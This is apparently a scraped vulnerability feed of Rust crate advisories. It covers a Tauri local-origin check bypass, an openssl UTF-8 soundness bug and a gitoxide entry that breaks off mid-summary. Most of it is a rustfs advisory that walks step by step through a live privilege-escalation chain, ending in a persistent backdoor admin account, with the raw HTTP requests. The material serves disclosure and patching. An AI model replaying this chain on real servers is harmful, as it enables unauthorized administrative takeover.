### Summary A flaw in Tauri's `is_local_url()` function causes it to incorrectly classify remote URLs as trusted local origins on Windows and Android. On these systems, Tauri maps custom URI scheme protocols to `http://<scheme>.localhost/` because those platforms' WebView implementations cannot serve custom URI schemes directly. The issue is that Tauri's check to see if the origin is local, only checks the first subdomain of the URL. An attacker can abuse this by hosting a page on a domain whose subdomain matches the custom scheme of the application (e.g. http://app.attacker.com/)." Example: - Local URL: `app://localhost/` → on Android/Windows: `http://app.localhost/` - The check passes for any URL starting with `http://app.`, including `http://app.evil.com/` As a result, the attacker page can invoke backend commands that the developer intended to be accessible only to the app's own frontend and that are explicitly restricted from being called by external or remote origins. ### Details Vulnerable function: ```rust #[cfg(any(windows, target_os = "android"))] let local = { let protocol_url = self.manager().tauri_protocol_url(uses_https); let maybe_protocol = current_url .domain() .and_then(|d| d.split_once('.')) // BUG: only splits on first dot .unwrap_or_default() .0; protocols.contains_key(maybe_protocol) && scheme == protocol_url.scheme() }; ``` Link: https://github.com/tauri-apps/tauri/blob/1ef6a119b1571d1da0acc08bdb7fd5521a4c6d52/crates/tauri/src/webview/mod.rs#L1680 `split_once('.')` discards everything after the first `.`. For http://app.evil.com/, the extracted label is app. If the application has registered a protocol named app, `protocols.contains_key("app")` returns `true` and the URL is classified as `Origin::Local`. The correct check must assert the full domain is exactly `<protocol>.localhost`. ### PoC We created a proof of concept app that can be found [here](https://drive.google.com/file/d/1YME6YMSKv69JxFF7Ne0OrZ6tGC_OH7Jw/view?usp=sharing). The app registers a custom app:// protocol and exposes a ping command restricted to local origins only. It provides a button to open a URL in a WebView, pre-filled with https://app.robbe-bc9.workers.dev/, an attacker-controlled page that invokes ping on load. Because the domain's first label matches the registered app protocol, is_local_url() classifies it as a local origin and the command succeeds. `capabilities/main.json` contains the following code, which only exposes `ping` locally: ```json { "$schema": "../../../crates/tauri-schema-generator/schemas/capability.schema.json", "identifier": "main", "local": true, "windows": ["*"], "permissions": [ "sample:allow-ping" ] } ``` `src/lib.rs` contains the following code, to register a custom scheme: ```rust tauri::Builder::default() .register_uri_scheme_protocol("app", |_ctx, _request| { ... }) ``` ### Impact The attacker page can invoke backend commands that the developer intended to be accessible only to the app's own frontend and that are explicitly restricted from being called by external or remote origins.

الإصدارات المتأثرة

2.0.0 → 2.11.1

CVSS Vector

CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N

عالية
📦 openssl 📌 All versions < 0.10.79 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 `X509Ref::ocsp_responders` returns OCSP responder URLs from a certificate's AIA extension as `OpensslString`, whose `Deref<Target = str>` wraps the raw bytes with `str::from_utf8_unchecked`. OpenSSL does not enforce that the underlying IA5String is ASCII, so a certificate with no...
📅 2026-05-05 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

`X509Ref::ocsp_responders` returns OCSP responder URLs from a certificate's AIA extension as `OpensslString`, whose `Deref<Target = str>` wraps the raw bytes with `str::from_utf8_unchecked`. OpenSSL does not enforce that the underlying IA5String is ASCII, so a certificate with non-UTF-8 bytes in its OCSP accessLocation causes safe Rust code to construct a `&str` that violates the UTF-8 invariant — resulting in undefined behavior.

الإصدارات المتأثرة

All versions < 0.10.79

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

عالية
📦 rustfs 📌 All versions < alpha.98 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ## Summary `ListServiceAccount` (`GET /rustfs/admin/v3/list-service-accounts?user=<other>`) authorizes cross-user requests against `UpdateServiceAccountAdminAction` instead of `ListServiceAccountsAdminAction` at `rustfs/src/admin/handlers/service_account.rs:936`. The handler acc...
📅 2026-05-05 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

## Summary `ListServiceAccount` (`GET /rustfs/admin/v3/list-service-accounts?user=<other>`) authorizes cross-user requests against `UpdateServiceAccountAdminAction` instead of `ListServiceAccountsAdminAction` at `rustfs/src/admin/handlers/service_account.rs:936`. The handler accepts the **wrong** admin action and rejects the **correct** one: - A user granted only `admin:UpdateServiceAccount` enumerates every service account in the cluster, including the root user's (HTTP 200, full metadata). - A user granted only `admin:ListServiceAccounts` — the permission name every IAM document treats as "list service accounts" — receives HTTP 403 AccessDenied on the same request. Because service account access keys act as the identifier a `UpdateServiceAccount` holder needs to rotate a secret, and the `UpdateServiceAccount` handler at `rustfs/src/admin/handlers/service_account.rs:489` performs no ownership check on the target access key, leaking those access keys lets a delegated "service account updater" role overwrite `root-sa-1`'s secret, authenticate as the root user's service account, and create a persistent backdoor admin with `admin:*` + `s3:*`. Proven live end-to-end against `rustfs/rustfs:latest` (1.0.0-alpha.91, revision `d4ea14c2`) — the same revision is byte-identical on current `origin/main`. ## Vulnerability Details - **Package:** `rustfs` (binary crate `rustfs`) - **Affected versions:** From `0a2411f` (the initial `service_account.rs` check-in on 2026-03-15) through current HEAD `90e584a`. The vulnerable line has never been touched. - **Fixed versions:** None - **Vulnerable file:** `rustfs/src/admin/handlers/service_account.rs` - **Vulnerable route:** `GET /rustfs/admin/v3/list-service-accounts?user=<other_user>` (`ListServiceAccount::call`) - **CWE:** CWE-863 (Incorrect Authorization), chained with CWE-620 (Unverified Password Change) to reach CWE-269 (Improper Privilege Management) - **CVSS (demonstrated chain to full admin):** `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H` = **10.0 Critical**. If scored as Scope:Unchanged the vector is `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` = **8.8 High**. The list bug alone (no chain) is `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N` = **6.5 Medium** and is what a maintainer would rate it if the Update ownership gap is out of scope for this report. ## Two Distinct Vulnerabilities This report documents two bugs that chain to full RustFS administrative takeover. Each is independently fixable and independently a security issue: **Vulnerability A — Wrong action constant in ListServiceAccount (CWE-863)** `ListServiceAccount::call` at line 936 checks `UpdateServiceAccountAdminAction` instead of `ListServiceAccountsAdminAction`. This is a copy-paste typo: the three sibling list handlers (lines 658, 799, 1095) all use the correct constant. The result is a permission inversion — the correct permission (`admin:ListServiceAccounts`) is rejected, and the wrong one (`admin:UpdateServiceAccount`) is accepted. Independently, this is a Medium-severity cross-user information disclosure. **Vulnerability B — Missing ownership check in UpdateServiceAccount (CWE-620)** `UpdateServiceAccount::call` at lines 489-614 authorizes on possession of `admin:UpdateServiceAccount` but never verifies the target `?accessKey=` belongs to the caller or the caller's parent. Lines 522-525 contain a commented-out `get_service_account` call that would have loaded the target for such a check. This means any holder of `admin:UpdateServiceAccount` can overwrite any service account's secret in the cluster, regardless of ownership. **Chain (A + B) — Full RustFS administrative takeover** Vulnerability A leaks every service account's access key (including the root administrator's). Vulnerability B allows overwriting any SA's secret given its access key. Together: a user with a single permission (`admin:UpdateServiceAccount`) enumerates the root user's SA access key via the wrong-action list bug, overwrites its secret via the ownership-free update handler, authenticates as the root user's service account, and creates a persistent backdoor admin with full RustFS administrative control. **Authorization mismatch at a glance:** Exact policies attached to each test identity (retrieved from running server via `GET /admin/v3/info-canned-policy`): legit-list-pol -> {"Action": ["admin:ListServiceAccounts"], "Resource": ["arn:aws:s3:::*"]} list-sa-probe-pol -> {"Action": ["admin:UpdateServiceAccount"], "Resource": ["arn:aws:s3:::*"]} list-sa-restricted -> {"Action": ["admin:UpdateServiceAccount"], "Resource": ["arn:aws:s3:::probe-scope/*"]} (zero-priv-user has no attached policy) | Identity | Attached policy | `GET /list-service-accounts?user=rustfsadmin` | Expected | |---|---|---|---| | `probe-user` | `list-sa-probe-pol` (`admin:UpdateServiceAccount`) | **200** (full SA metadata) | 403 | | `legit-list-user` | `legit-list-pol` (`admin:ListServiceAccounts`) | **403** AccessDenied | 200 | | `restricted-update-user` | `list-sa-restricted` (`admin:UpdateServiceAccount` on `probe-scope/*`) | **200** | 403 | | `zero-priv-user` | (none) | **403** | 403 | | (unauthenticated) | n/a | **403** Signature required | 403 | ### Why the correct permission gets 403 The handler at line 936 calls `is_allowed` with the action `AdminAction::UpdateServiceAccountAdminAction`. The IAM engine performs an exact string match between the action in the `is_allowed` call (`admin:UpdateServiceAccount`) and the action in the caller's attached policy: - `legit-list-user` has policy action `admin:ListServiceAccounts`. This does **not** match `admin:UpdateServiceAccount`. `is_allowed` returns false. The handler returns 403. The user who holds the *correct* permission for listing service accounts is denied. - `probe-user` has policy action `admin:UpdateServiceAccount`. This **matches** `admin:UpdateServiceAccount`. `is_allowed` returns true. The handler returns 200. The user who holds a *different, unrelated* permission is granted access to a list endpoint. - `restricted-update-user` has the same action string but resource-scoped to `arn:aws:s3:::probe-scope/*`. Admin-action statements skip resource matching (`crates/policy/src/policy/statement.rs:132`: `&& !self.is_admin() && !self.is_sts()`), so the resource restriction is ignored and `is_allowed` still returns true. There is no wildcard, superset, or inheritance relationship between these two action strings. They are separate enum variants (`crates/policy/src/policy/action.rs:459-462`) with distinct `strum(serialize)` values. The IAM engine is working correctly; the handler passes the wrong action to it. Raw request/response for `legit-list-user` (the counterintuitive 403): GET /rustfs/admin/v3/list-service-accounts?user=rustfsadmin HTTP/1.1 Authorization: AWS4-HMAC-SHA256 Credential=legit-list-user/... HTTP/1.1 403 <?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><Message>access denied</Message></Error> **Why this is not "working as intended":** - `admin:UpdateServiceAccount` and `admin:ListServiceAccounts` are distinct enum variants with distinct string representations. The codebase treats them as orthogonal permissions. - Three sibling list handlers in the same file (lines 658, 799, 1095) all check `ListServiceAccountsAdminAction`. Only line 936 deviates. - CVE-2026-22042 / GHSA-vcwh-pff9-64cc is the maintainers' own precedent: `ImportIam` checking `ExportIAMAction` was rated Medium and fixed. The same class of bug applies here. - A zero-privilege user (no admin policies at all) cannot exploit either vulnerability — both handlers correctly enforce their respective `is_allowed` checks. The bug is that the list handler enforces the *wrong* action constant, not that it skips enforcement entirely. ## Root Cause — Vulnerability A (Wrong Action Constant) `ListServiceAccount::call` is registered for `GET /rustfs/admin/v3/list-service-accounts` at `rustfs/src/admin/handlers/service_account.rs:137-141`. The cross-user branch (entered when `?user=<x>` does not match the caller) checks the wrong admin action: // rustfs/src/admin/handlers/service_account.rs:931-953 (HEAD 90e584a, identical at d4ea14c2) let target_account = if query.user.as_ref().is_some_and(|v| v != &cred.access_key) { if !iam_store .is_allowed(&Args { account: &cred.access_key, groups: &cred.groups, action: Action::AdminAction(AdminAction::UpdateServiceAccountAdminAction), // WRONG bucket: "", conditions: &get_condition_values(...), is_owner: owner, object: "", claims: cred.claims.as_ref().unwrap_or(&HashMap::new()), deny_only: false, }) .await { return Err(s3_error!(AccessDenied, "access denied")); } query.user.unwrap_or_default() } else if cred.parent_user.is_empty() { cred.access_key } else { cred.parent_user }; The action enum definitions are cleanly distinct at `crates/policy/src/policy/action.rs:459-464`: #[strum(serialize = "admin:CreateServiceAccount")] CreateServiceAccountAdminAction, #[strum(serialize = "admin:UpdateServiceAccount")] UpdateServiceAccountAdminAction, #[strum(serialize = "admin:RemoveServiceAccount")] RemoveServiceAccountAdminAction, #[strum(serialize = "admin:ListServiceAccounts")] ListServiceAccountsAdminAction, Every *other* list handler in the same file authorizes on the correct constant: rustfs/src/admin/handlers/service_account.rs:658 InfoServiceAccount::call -> ListServiceAccountsAdminAction rustfs/src/admin/handlers/service_account.rs:799 InfoAccessKey::call -> ListServiceAccountsAdminAction rustfs/src/admin/handlers/service_account.rs:1095 ListAccessKeysBulk::call -> ListServiceAccountsAdminAction Only `ListServiceAccount::call` at line 936 deviates. This is a typo/wiring error, not a design choice. `git blame` shows the line has been wrong since commit `0a2411f` (heihutu, 2026-03-15), the initial check-in of `service_account.rs`. ## Root Cause — Vulnerability B (Missing Ownership Check in Update) Service account access keys are the identifier the `UpdateServiceAccount` handler accepts via the `?accessKey=` query string. Inspecting `UpdateServiceAccount::call` at `rustfs/src/admin/handlers/service_account.rs:489-614`: let access_key = query.access_key; // line 509 ... if !iam_store.is_allowed(&Args { account: &cred.access_key, action: Action::AdminAction(AdminAction::UpdateServiceAccountAdminAction), ... }).await { return Err(s3_error!(AccessDenied, "access denied")); } // line 538-559 ... let updated_at = iam_store.update_service_account(&access_key, opts).await // line 579 .map_err(...)?; The handler authorizes on *possession of* `admin:UpdateServiceAccount` and **never checks** that the `?accessKey=` query parameter resolves to a service account owned by the caller. Notably, lines 522-525 contain a commented-out `get_service_account` call that would have loaded the target SA for an ownership check — it was present in the initial commit and has been commented out since: // let svc_account = iam_store.get_service_account(&access_key).await.map_err(|e| { // debug!("get service account failed, e: {:?}", e); // s3_error!(InternalError, "get service account failed") // })?; The inner `IamSys::update_service_account` at `crates/iam/src/sys.rs:495-501` delegates to `IamCache::update_service_account` at `crates/iam/src/manager.rs:663` which loads the credentials by access-key name, verifies it is a service account, and overwrites `secret_key` — again, no ownership check: // crates/iam/src/manager.rs:663 pub async fn update_service_account(&self, name: &str, opts: UpdateServiceAccountOpts) -> Result<OffsetDateTime> { let Some(ui) = self.cache.users.load().get(name).cloned() else { return Err(Error::NoSuchServiceAccount(name.to_string())); }; ... let mut cr = ui.credentials.clone(); let current_secret_key = cr.secret_key.clone(); if let Some(secret) = opts.secret_key { if !is_secret_key_valid(&secret) { return Err(Error::InvalidSecretKeyLength); } cr.secret_key = secret; // <-- attacker-chosen } ... So a holder of `admin:UpdateServiceAccount` who knows *any* service account's access key can overwrite its secret. The list bug at line 936 hands them every access key in the cluster, including `root-sa-1`. The two bugs together form a clean chain: 1. Attacker has a single admin permission: `admin:UpdateServiceAccount`. 2. Attacker calls `GET /v3/list-service-accounts?user=rustfsadmin` — vulnerable handler grants access. 3. Attacker reads `accessKey=root-sa-1` out of the response. 4. Attacker calls `POST /v3/update-service-account?accessKey=root-sa-1` with body `{"newSecretKey":"..."}` — ownership-less handler overwrites. 5. Attacker authenticates as `root-sa-1` with the chosen secret and inherits the root user's full `admin:*` + `s3:*` authority. ## Environment and Version Alignment - Image: `rustfs/rustfs:latest`, digest `sha256:74f8eaad96124c7e019bedfb892b41a9429c495f57b883182427c5e9e9d53c6a` - Labels: `org.opencontainers.image.version=1.0.0-alpha.91`, `org.opencontainers.image.revision=d4ea14c2ba99602314511d5862005f7b871ece37`, `org.opencontainers.image.build-type=prerelease` - Source verification: $ git show d4ea14c2:rustfs/src/admin/handlers/service_account.rs | sed -n '931,940p' let target_account = if query.user.as_ref().is_some_and(|v| v != &cred.access_key) { if !iam_store .is_allowed(&Args { account: &cred.access_key, groups: &cred.groups, action: Action::AdminAction(AdminAction::UpdateServiceAccountAdminAction), bucket: "", ... $ git show origin/main:rustfs/src/admin/handlers/service_account.rs | sed -n '931,940p' let target_account = if query.user.as_ref().is_some_and(|v| v != &cred.access_key) { if !iam_store .is_allowed(&Args { account: &cred.access_key, groups: &cred.groups, action: Action::AdminAction(AdminAction::UpdateServiceAccountAdminAction), bucket: "", ... Byte-identical. The shipped image contains the same vulnerable handler as the tip of main. ## Proof of Concept (executed live) ### Environment docker run -d --name rustfs-poc --memory=2g -p 9100:9000 \ -e RUSTFS_ACCESS_KEY=rustfsadmin -e RUSTFS_SECRET_KEY=rustfsadmin \ rustfs/rustfs:latest Root credentials: `rustfsadmin:rustfsadmin`. ### Step 1 — Provision the probe identity The probe policy grants exactly **one** admin action, scoped to the broadest resource. Nothing else. { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": ["admin:UpdateServiceAccount"], "Resource": ["arn:aws:s3:::*"] } ] } Creation as root: PUT /rustfs/admin/v3/add-canned-policy?name=list-sa-probe-pol -> 200 PUT /rustfs/admin/v3/add-user?accessKey=probe-user -> 200 (secret: probe-secret1234) PUT /rustfs/admin/v3/set-user-or-group-policy?userOrGroup=probe-user&isGroup=false&policyName=list-sa-probe-pol -> 200 PUT /rustfs/admin/v3/add-user?accessKey=victim-user -> 200 (no policy) PUT /rustfs/admin/v3/add-service-accounts -> 200 (creates victim-sa-1 under victim-user) PUT /rustfs/admin/v3/add-service-accounts -> 200 (creates root-sa-1 under rustfsadmin) ### Step 2 — Baseline: probe-user is actually constrained Confirming `probe-user` is denied on unrelated admin endpoints so the "200 on list-service-accounts" is not the side effect of some ambient privilege: GET /rustfs/admin/v3/list-users as probe-user -> 403 AccessDenied GET /rustfs/admin/v3/info as probe-user -> 403 AccessDenied GET /rustfs/admin/v3/list-canned-policies as probe-user -> 403 AccessDenied GET /rustfs/admin/v3/kms/status as probe-user -> 403 AccessDenied PUT /rustfs/admin/v3/add-canned-policy?name=... as probe-user -> 403 AccessDenied GET /rustfs/admin/v3/list-service-accounts as probe-user -> 200 {"accounts":[]} # self-scope OK The self-scope list (no `user=` query) returns an empty array — the caller's own service account inventory, which is correctly allowed. This isolates the bug to the cross-user branch only. ### Step 3 — Primary exploit: enumerate other users' service accounts GET /rustfs/admin/v3/list-service-accounts?user=victim-user as probe-user -> 200 {"accounts":[{"parentUser":"victim-user","accountStatus":"on","impliedPolicy":true,"accessKey":"victim-sa-1","name":"sa-victim-user-victim-sa-1","description":"probe target SA for user victim-user","expiration":null}]} GET /rustfs/admin/v3/list-service-accounts?user=rustfsadmin as probe-user -> 200 {"accounts":[{"parentUser":"rustfsadmin","accountStatus":"on","impliedPolicy":true,"accessKey":"root-sa-1","name":"sa-rustfsadmin-root-sa-1","description":"probe target SA for user rustfsadmin","expiration":null}]} Exposed per entry: `parentUser`, `accountStatus`, `impliedPolicy`, **`accessKey`**, `name`, `description`, `expiration`. The response does not leak secret keys or session tokens (those are cleared server-side), but it does leak the `accessKey` — the identifier that the `UpdateServiceAccount` endpoint consumes via `?accessKey=`. ### Step 4 — Differential: the correct permission gets denied Created `legit-list-user` with a policy granting only `admin:ListServiceAccounts`: { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": ["admin:ListServiceAccounts"], "Resource": ["arn:aws:s3:::*"] } ] } Running the same request: GET /rustfs/admin/v3/list-service-accounts?user=rustfsadmin as legit-list-user -> 403 <?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><Message>access denied</Message></Error> This is the damning evidence of inversion. The handler refuses the **correct** permission (`admin:ListServiceAccounts`) and accepts the **wrong** one (`admin:UpdateServiceAccount`). There is no superset/subset relationship in the action enum; these are two distinct constants. A deployment that grants its operators `admin:ListServiceAccounts` to view the service account inventory — the intuitive and documented approach — will see every cross-user list request return 403 until this bug is fixed. The resource-scoped variant gave the same result as the broad variant: # Policy: admin:UpdateServiceAccount on arn:aws:s3:::probe-scope/* (unrelated to any SA) GET /rustfs/admin/v3/list-service-accounts?user=rustfsadmin as restricted-update-user -> 200 (same body as probe-user) Resource restrictions on admin actions are skipped in `crates/policy/src/policy/statement.rs:132` (`&& !self.is_admin() && !self.is_sts()`), so the bug is equally reachable by an operator whose `admin:UpdateServiceAccount` grant was scoped to a specific bucket. And unauthenticated requests are still rejected: GET /rustfs/admin/v3/list-service-accounts?user=rustfsadmin (no signature) -> 403 "Signature is required" This is an **authenticated privilege-boundary violation**, not a pre-auth bug. ### Step 4b — Zero-privilege user is correctly blocked To confirm the bug is in the action constant (not a missing check), created `zero-priv-user` with **no policies at all**: GET /rustfs/admin/v3/list-service-accounts?user=rustfsadmin as zero-priv-user -> 403 AccessDenied POST /rustfs/admin/v3/update-service-account?accessKey=root-sa-1 as zero-priv-user -> 403 AccessDenied GET /rustfs/admin/v3/list-service-accounts as zero-priv-user -> 200 {"accounts":[]} # self-scope only The `is_allowed` check at line 936 fires and correctly blocks zero-priv-user because they have *no* admin permissions. The bug is not that the check is skipped — it is that the check uses the **wrong action constant**, so it grants access to users holding `admin:UpdateServiceAccount` (the wrong permission) and denies users holding `admin:ListServiceAccounts` (the correct permission). ### Step 5 — Full chain to RustFS admin takeover (persistent backdoor) With `accessKey=root-sa-1` known, `probe-user` (still only `admin:UpdateServiceAccount`) hijacks the root service account's secret: POST /rustfs/admin/v3/update-service-account?accessKey=root-sa-1 as probe-user body: {"newSecretKey":"pwned-secret-2"} -> 204 NoContent Then re-signs and calls admin APIs as `root-sa-1/pwned-secret-2`: GET /rustfs/admin/v3/list-users as root-sa-1/pwned-secret-2 -> 200 {"svinfo-user":{"policyName":"serverinfo-only","status":"enabled",...}, "probe-user":{"policyName":"list-sa-probe-pol","status":"enabled",...}, "readonly-user":{"policyName":"readonly","status":"enabled",...}, "victim-user":{"status":"enabled",...}} GET /rustfs/admin/v3/info as root-sa-1/pwned-secret-2 -> 200 {"mode":"online","backend":{"backendType":"Erasure","online":...},"buckets":{"count":...},"services":{...}} Both endpoints previously returned 403 for `probe-user`. They now succeed because `root-sa-1` inherits `rustfsadmin`'s full authority. Extending the chain to a persistent backdoor, still driven by `probe-user`'s hijacked `root-sa-1` session: PUT /rustfs/admin/v3/add-user?accessKey=backdoor-admin -> 200 (body: {"secretKey":"backdoor-secret-9","status":"enabled"}) PUT /rustfs/admin/v3/add-canned-policy?name=proof-admin-all -> 200 (body: admin:* + s3:*) PUT /rustfs/admin/v3/set-user-or-group-policy?userOrGroup=backdoor-admin&isGroup=false&policyName=proof-admin-all -> 200 Direct authentication as the new admin (no further reliance on the hijacked SA): GET /rustfs/admin/v3/list-users as backdoor-admin/backdoor-secret-9 -> 200 (same full user dump) PUT /proof-admin-bucket as backdoor-admin/backdoor-secret-9 -> 200 (new bucket created on the S3 plane) The attacker now owns a persistent admin identity with `admin:*` and `s3:*` that will survive secret rotations on `root-sa-1`. Starting identity was a user granted exactly one admin action. ### Full PoC scripts Runnable top-to-bottom against a fresh `rustfs/rustfs:latest` container. Each script prints raw HTTP status codes and response bodies. - `poc/01_setup_probe_user.py` — create policies, users, service accounts. - `poc/02_baseline_probe.py` — 403/200 differential on unrelated admin endpoints. - `poc/03_exploit.py` — primary ListServiceAccount enumeration. - `poc/04_escalate_takeover.py` — hijack root-sa-1 and prove admin calls. - `poc/05_full_root_compromise.py` — end-to-end chain including backdoor-admin creation and new bucket. - `poc/06_differential_and_resource.py` — legit-list-user 403 and resource-scoped 200. ## Impact 1. **Full RustFS administrative takeover (Confidentiality: High, Integrity: High, Availability: High).** A user with a single admin permission (`admin:UpdateServiceAccount`) chains the list bug with the ownership-free `UpdateServiceAccount` handler to overwrite any service account's secret — including the root administrator's — and inherit full `admin:*` + `s3:*` authority over the RustFS deployment. Demonstrated live: probe-user → list → hijack root-sa-1 → create persistent backdoor-admin → create bucket. 2. **Authorization inversion on a core admin endpoint (Integrity).** Users granted the intended `admin:ListServiceAccounts` permission receive 403 on cross-user list requests. A rustfs deployment that issues `admin:ListServiceAccounts` to its operators (the obvious and documented interpretation of the action name) is silently broken until this is fixed. 3. **Cross-user service-account inventory disclosure (Confidentiality: High).** Even absent the update-ownership gap, the bug exposes every service account's access key, owning principal, name, description, account status, and expiration to any `admin:UpdateServiceAccount` holder. This maps the full service-account topology of the cluster and identifies which account to target for a secret rotation attack. 4. **Resource-scoped policies provide no mitigation (Integrity).** `statement.rs:132` skips resource matching for admin statements, so restricting `admin:UpdateServiceAccount` to a specific bucket ARN (the usual pattern for bounded delegation) gives a false sense of isolation and does not reduce the blast radius of this bug. ## Suggested Fix The minimal, correct fix is a one-line change at `rustfs/src/admin/handlers/service_account.rs:936`: // rustfs/src/admin/handlers/service_account.rs:936 - action: Action::AdminAction(AdminAction::UpdateServiceAccountAdminAction), + action: Action::AdminAction(AdminAction::ListServiceAccountsAdminAction), This brings `ListServiceAccount` in line with the three sibling handlers (lines 658, 799, 1095) that correctly enforce `ListServiceAccountsAdminAction`, and restores the documented meaning of the `admin:ListServiceAccounts` permission for operators who rely on it. ### Recommended follow-up (separate but related) Even after this fix, `UpdateServiceAccount::call` at `rustfs/src/admin/handlers/service_account.rs:489-614` will still lack any check that the target `?accessKey=` belongs to the caller (or the caller's parent), so any holder of `admin:UpdateServiceAccount` who can otherwise obtain the access key of a higher-privileged service account can still hijack it. Consider adding an ownership precondition inside the handler before calling `iam_store.update_service_account`: let target = iam_store.get_service_account(&access_key).await .map_err(|e| map_service_account_lookup_error(e, "get service account failed"))?; let caller_parent = if cred.parent_user.is_empty() { cred.access_key.as_str() } else { cred.parent_user.as_str() }; if target.0.parent_user != caller_parent && !is_owner { // Only root or the parent user should be able to mutate this SA. // (Or additionally require a dedicated admin action granted to full admins.) return Err(s3_error!(AccessDenied, "access denied")); } This additional check closes the secret-rotation primitive for non-root holders of `admin:UpdateServiceAccount`. It is outside the strict scope of the line-936 typo, but the live PoC shows it is the mechanism by which information disclosure escalates to full administrative takeover, so fixing both in one advisory avoids leaving a usable primitive in place. ## Self-Review - **Is this by-design?** No. The three sibling list handlers at lines 658, 799, and 1095 all enforce `ListServiceAccountsAdminAction`. The action enum has distinct `admin:UpdateServiceAccount` and `admin:ListServiceAccounts` strings with no wildcard relationship. There is no comment, test, or docstring suggesting the deviation at line 936 is intentional. CVE-2026-22042 / GHSA-vcwh-pff9-64cc (`ImportIam` using `ExportIAMAction`) is the maintainers' own precedent that this class of bug is treated as a real security issue. - **Reachability?** Proven live on `rustfs/rustfs:latest` revision `d4ea14c2`. Response bodies captured in the report above and in `poc/` logs. - **Is there upstream routing that enforces admin?** No. `S3Router::register` dispatches directly from `service_account.rs:137-141` into `ListServiceAccount::call`; the only authorization is the `is_allowed` call at line 931-953. Confirmed by the 200 return for `probe-user` and the 403 return for `legit-list-user` on the same path. - **Prior art?** No existing rustfs advisory covers this handler. `CVE-2026-22042` is the same *class* of bug in a different handler; `CVE-2026-22043` is a `deny_only` short-circuit bug in the same file but a completely different code path. Both are explicitly distinct from the line 936 typo. - **Is the docker image the same code as main?** Yes. Image label `org.opencontainers.image.revision=d4ea14c2`; `git show d4ea14c2:rustfs/src/admin/handlers/service_account.rs` at lines 931-960 is byte-identical to `git show origin/main:rustfs/src/admin/handlers/service_account.rs`. Re-verified on 2026-04-09 at HEAD `90e584a` — file unchanged since initial commit `0a2411f`. - The commented-out ownership check at lines 522-525 of `UpdateServiceAccount::call` demonstrates the developer was aware an ownership check belonged there but left it disabled. This is not a design decision — it is incomplete implementation that this report's chain exploits. - **Honest limitations:** - The primary exploit requires an authenticated principal with `admin:UpdateServiceAccount`. It is not pre-auth. - Secret keys of the enumerated service accounts are NOT returned by the list handler (they are explicitly cleared elsewhere). Only the access key is disclosed. The escalation to RustFS admin relies on the *Update* path to overwrite the secret, not on reading a leaked secret. - The full administrative takeover chain depends on the separate `UpdateServiceAccount` ownership gap. If a reviewer considers that gap out of scope for this report, the line-936 typo on its own is best-rated as **Medium** cross-user information disclosure (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N` = 6.5). The live PoC and differential stand independent of that scoping. - The differential (legit-list-user → 403, probe-user → 200) isolates the cause to the handler's action constant and is reproducible in seconds against a fresh container. ## Resources - Vulnerable file in image: `rustfs/src/admin/handlers/service_account.rs` @ `d4ea14c2ba99602314511d5862005f7b871ece37` - Vulnerable file at HEAD: `rustfs/src/admin/handlers/service_account.rs` @ `90e584a` (file unchanged since `0a2411f`) - Incorrect action at line 936: `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/rustfs/src/admin/handlers/service_account.rs#L931-L953` - Correct action at line 658 (`InfoServiceAccount`): `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/rustfs/src/admin/handlers/service_account.rs#L658` - Correct action at line 799 (`InfoAccessKey`): `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/rustfs/src/admin/handlers/service_account.rs#L799` - Correct action at line 1095 (`ListAccessKeysBulk`): `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/rustfs/src/admin/handlers/service_account.rs#L1095` - AdminAction enum: `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/crates/policy/src/policy/action.rs#L457-L464` - UpdateServiceAccount handler (ownership gap): `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/rustfs/src/admin/handlers/service_account.rs#L489-L614` - IamCache::update_service_account: `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/crates/iam/src/manager.rs#L663` - Admin statements skip resource matching: `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/crates/policy/src/policy/statement.rs#L132` - rustfs security policy: `https://github.com/rustfs/rustfs/security/policy` - Prior art (same class, different handler): `CVE-2026-22042` / `GHSA-vcwh-pff9-64cc` Koda Reef

الإصدارات المتأثرة

All versions < alpha.98

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

عالية
📦 gitoxide 📌 All versions < 0.52.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ## **Summary** attachments: [pocs.zip](https://github.com/user-attachments/files/26431422/pocs.zip) Submodule names coming from `.gitmodules` are exposed as unvalidated names and are later reused to derive the submodule git directory as: ``` <superproject common_dir>/modules/<s...
📅 2026-05-05 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

